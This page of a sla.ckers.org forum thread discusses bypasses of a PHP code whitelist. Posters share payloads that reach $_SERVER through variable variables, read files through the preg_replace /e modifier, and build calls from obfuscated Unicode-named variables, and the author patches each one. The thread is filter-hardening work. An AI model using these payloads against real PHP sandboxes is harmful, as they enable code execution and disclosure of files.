Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: Previous12
Current Page: 2 of 2
Re: PHP White list 1.0!
Posted by: lpilorz
Date: August 26, 2008 11:44AM

Two more ;)

cpreg_replace(' /x/e ','readfile("phpwhitelist.php")','x');

$x="_SERVER"; var_dump($$x);

Options: ReplyQuote
Re: PHP White list 1.0!
Posted by: Kyo
Date: August 27, 2008 09:49AM

I thought of one myself based on the one posted earlier:

<?php function _SERVER() {} print_r( ${_SERVER}); ?>

Anyway, thank you. I'm gonna fix all of these now. I love the whitespace preg_replace one, btw :D

edit: also
<?php $x = "_SERVER"; print_r( $${x}); ?>


Ok, it's updated

edit: damn, I forgot about this:
<?php function x(){} $x = "_SERVER"; print_r( ${${x}}); ?>

edit 2: and this:
<?php function x(){} $x = "_SERVER"; print_r( ${${"x"}}); ?>

edit 3: and this:
<?php print_r(${trim("_SERVER")}); ?>

edit 4:

Ok, I fixed it by just blocking it out altogether, it's just not worth it. Nobody uses this kind of syntax anyway, and it's just an invitation for exploits



Edited 7 time(s). Last edit at 08/27/2008 10:20AM by Kyo.

Options: ReplyQuote
Re: PHP White list 1.0!
Posted by: Kyo
Date: March 14, 2009 06:24AM

No news in a long time. I'm currently working on a template engine which I plan on releasing to the general public, so I'll be updating this, cleaning it up and then eventually making an official release.

Expect updates.

Options: ReplyQuote
Re: PHP White list 1.0!
Posted by: Gareth Heyes
Date: September 26, 2011 12:45PM

I think this may pwn your script:
[hackvertor.co.uk]

I can't display it correctly on slackers but it looks something like this:

<?php $§[]=$§;$§=$§.$§;$ϩ=+$§;$Ϫ=$ϩ;$Ϫ++;$ϫ=$Ϫ+$Ϫ;$Ϭ=$ϫ+$Ϫ;$ϭ=$Ϭ+$Ϫ;$Ϯ=$ϭ+$Ϫ;$ϯ=$Ϯ+$Ϫ;$ϰ=$ϯ+$Ϫ;$ϱ=$ϰ+$Ϫ;$ї=$ϱ+$Ϫ;$Ұ=$§[$ϩ]|($§[$Ϭ]^);$ұ=$§[$Ϫ];$Ӥ=$§[$ϩ]|($§[$Ϫ]&â);$ӥ=$§[$ї+$Ϫ];$Ӧ=$Ұ^($ϰ.ӥ);$ӧ=$Ӥ.$Ӧ.$ұ;$Ө=$ӧ($ї.$ϰ).$ӧ($Ϫ.$Ϫ.$Ϯ).$ӧ($Ϫ.$Ϫ.$Ϯ).$ӧ($Ϫ.$ϩ.$Ϫ).$ұ.$ӧ($Ϫ.$Ϫ.$ϯ);$Ө($ӧ($Ϫ.$Ϫ.$ϫ).$ӧ($Ϫ.$Ϫ.$ϭ).$ӧ($Ϫ.$ϩ.$Ϯ).$ӧ($Ϫ.$Ϫ.$ϩ).$ӧ($Ϫ.$Ϫ.$ϯ).$ӧ($ї.$Ϯ).$ӧ($Ϫ.$Ϫ.$ϭ).$ӧ($ϭ.$ϩ).$ӧ($Ϭ.$ϯ).$ӧ($ї.$Ϯ).$ӧ($ϱ.$Ϭ).$ӧ($ϯ.$ї).$ӧ($ϱ.$ϫ).$ӧ($ϱ.$ϯ).$ӧ($ϯ.$ї).$ӧ($ϱ.$ϫ).$ӧ($ϭ.$Ϫ));?>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Pages: Previous12
Current Page: 2 of 2


Sorry, only registered users may post in this forum.